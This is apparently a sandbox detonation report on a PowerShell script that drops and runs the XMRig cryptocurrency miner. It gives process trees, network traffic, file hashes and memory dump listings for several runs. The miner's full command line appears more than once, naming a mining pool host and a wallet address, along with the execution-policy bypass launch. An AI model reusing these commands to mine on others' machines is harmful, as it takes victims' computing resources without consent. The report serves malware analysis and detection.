memory/3160-69-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-70-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-71-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-72-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-73-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-74-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-75-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-76-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-77-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-78-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-79-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-80-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-81-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-82-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-83-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-84-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-85-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-86-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-87-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-88-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-89-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-90-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-91-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-92-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-93-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-94-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-95-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-96-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-97-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-98-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-99-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-100-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-101-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-102-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-103-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-104-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-105-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-106-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-107-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-108-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-109-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-110-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-111-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-112-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-113-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-114-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-115-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-116-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:05

Platform

win10v2004-20240611-en

Max time kernel

1789s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
GB 184.28.176.112:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 112.176.28.184.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/4472-0-0x00007FFB3CCB3000-0x00007FFB3CCB5000-memory.dmp

memory/4472-1-0x000002EB2B9D0000-0x000002EB2B9F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ifnfek5s.ho4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4472-11-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/4472-12-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/4472-14-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/4472-15-0x000002EB44990000-0x000002EB449A2000-memory.dmp

memory/4472-16-0x000002EB44980000-0x000002EB4498A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2548-47-0x000001B6A1900000-0x000001B6A1920000-memory.dmp

memory/2548-48-0x000001B6A1940000-0x000001B6A1960000-memory.dmp

memory/2548-49-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-51-0x000001B733FE0000-0x000001B734000000-memory.dmp

memory/2548-50-0x000001B6A1960000-0x000001B6A1980000-memory.dmp

memory/2548-52-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/4472-53-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/4472-54-0x00007FFB3CCB3000-0x00007FFB3CCB5000-memory.dmp

memory/4472-55-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/2548-56-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/4472-57-0x00007FFB3CCB0000-0x00007FFB3D771000-memory.dmp

memory/2548-60-0x000001B733FE0000-0x000001B734000000-memory.dmp

memory/2548-59-0x000001B6A1960000-0x000001B6A1980000-memory.dmp

memory/2548-58-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-61-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-62-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-63-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-64-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-65-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-66-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-67-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-68-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-69-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-70-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-71-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-72-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-73-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-74-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-75-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-76-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-77-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-78-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-79-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-80-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-81-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-82-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-83-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-84-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-85-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-86-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-87-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-88-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-89-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-90-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-91-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-92-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-93-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-94-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-95-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-96-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-97-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-98-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-99-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-100-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-101-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-102-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-103-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-104-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-105-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-106-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-107-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-108-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-109-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-110-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-111-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-112-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-113-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-114-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-115-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-116-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-117-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-118-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

memory/2548-119-0x00007FF719DF0000-0x00007FF71AA23000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:10

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1164-3-0x00007FFEA40A3000-0x00007FFEA40A4000-memory.dmp

memory/1164-5-0x000001FAAB230000-0x000001FAAB252000-memory.dmp

memory/1164-6-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-9-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-10-0x000001FAAB3E0000-0x000001FAAB456000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aq4sctou.a0y.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1164-25-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-29-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-30-0x00007FFEA40A3000-0x00007FFEA40A4000-memory.dmp

memory/1164-31-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-32-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/1164-52-0x000001FAAB3C0000-0x000001FAAB3D2000-memory.dmp

memory/1164-65-0x000001FAAB3A0000-0x000001FAAB3AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2060-94-0x00000265D35C0000-0x00000265D35E0000-memory.dmp

memory/2060-95-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-96-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-97-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-98-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-99-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-100-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-101-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-102-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-103-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-104-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-105-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-106-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-107-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-108-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-109-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-110-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-111-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-112-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-113-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-114-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-115-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-116-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-117-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-118-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-119-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-120-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-121-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-122-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-123-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-124-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-125-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-126-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-127-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-128-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-129-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-130-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-131-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-132-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-133-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-134-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-135-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-136-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-137-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-138-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-139-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-140-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-141-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-142-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-143-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-144-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-145-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-146-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-147-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-148-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-149-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-150-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-151-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-152-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-153-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-154-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-155-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-156-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

memory/2060-157-0x00007FF6B1C00000-0x00007FF6B2833000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:13

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
